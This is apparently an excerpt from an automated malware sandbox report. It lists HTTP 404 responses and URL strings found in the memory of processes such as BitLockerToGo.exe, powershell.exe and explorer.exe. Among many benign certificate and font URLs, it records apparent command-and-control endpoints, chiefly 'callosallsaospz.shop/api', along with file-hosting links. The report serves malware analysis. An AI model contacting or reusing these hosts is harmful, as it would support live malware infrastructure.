Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Source: 34CA.exe, 00000008.00000002.2600393793.00007FF65BB53000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe, 00000008.00000000.2466754046.00007FF65BB44000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe.1.dr	String found in binary or memory: http://.css
Source: 34CA.exe, 00000008.00000002.2600393793.00007FF65BB53000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe, 00000008.00000000.2466754046.00007FF65BB44000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe.1.dr	String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: BD9E.exe.1.dr	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: BD9E.exe.1.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: powershell.exe, 0000000E.00000002.2783985099.000002EC464C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: BD9E.exe.1.dr	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: BD9E.exe.1.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: BD9E.exe.1.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: BD9E.exe.1.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 34CA.exe, 00000008.00000002.2600393793.00007FF65BB53000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe, 00000008.00000000.2466754046.00007FF65BB44000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe.1.dr	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 0000000E.00000002.2777085480.000002EC3E13C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.000000000982D000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BD9E.exe.1.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: BD9E.exe.1.dr	String found in binary or memory: http://ocsps.ssl.com0?
Source: BD9E.exe.1.dr	String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: BD9E.exe, 0000000A.00000002.2843609071.000001DCCE483000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rentry.co
Source: explorer.exe, 00000001.00000000.1713458157.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713879166.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1714979085.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E501000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: BD9E.exe, 0000000A.00000002.2843609071.000001DCCE071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2E0D1000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000012.00000002.4114379558.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E501000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2F871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store4.gofile.io
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000001.00000000.1716518107.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: powershell.exe, 0000000E.00000002.2727719686.000002EC2C27A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pki/certs/Miut_2010-06-23.cr
Source: 2FBE.exe, 2FBE.exe.1.dr	String found in binary or memory: http://www.oberhumer.com
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: BD9E.exe.1.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: BD9E.exe.1.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1716518107.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E0D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2F533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2F533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1714271220.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1714271220.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1711728806.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1711065228.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1714271220.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1714271220.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: BitLockerToGo.exe, 0000000D.00000002.2710534110.0000000003021000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666659329.000000000301D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666787335.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2632557485.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2706400829.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666377646.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/
Source: BitLockerToGo.exe, 0000000D.00000003.2645696277.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666343449.0000000003019000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666871415.0000000003022000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666696277.000000000301E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666017373.0000000003011000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644409478.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644907653.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666659329.000000000301D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666787335.0000000003020000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/&
Source: BitLockerToGo.exe, 0000000D.00000003.2666343449.0000000003019000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666871415.0000000003022000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666696277.000000000301E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666017373.0000000003011000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666659329.000000000301D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666787335.0000000003020000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/1
Source: BitLockerToGo.exe, 0000000D.00000003.2613300795.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2705841267.0000000003016000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644907653.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2709297632.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2710036520.0000000003016000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2706400829.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2645696277.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2709297632.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644409478.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2631526881.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666377646.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644907653.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2613784729.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2631526881.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644907653.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2612260038.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2684009492.0000000003016000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2632557485.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2706400829.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2645696277.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2645696277.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api
Source: BitLockerToGo.exe, 0000000D.00000003.2631526881.000000000300D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api3QFjF/HP
Source: BitLockerToGo.exe, 0000000D.00000002.2709297632.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2706400829.000000000300D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/apiD
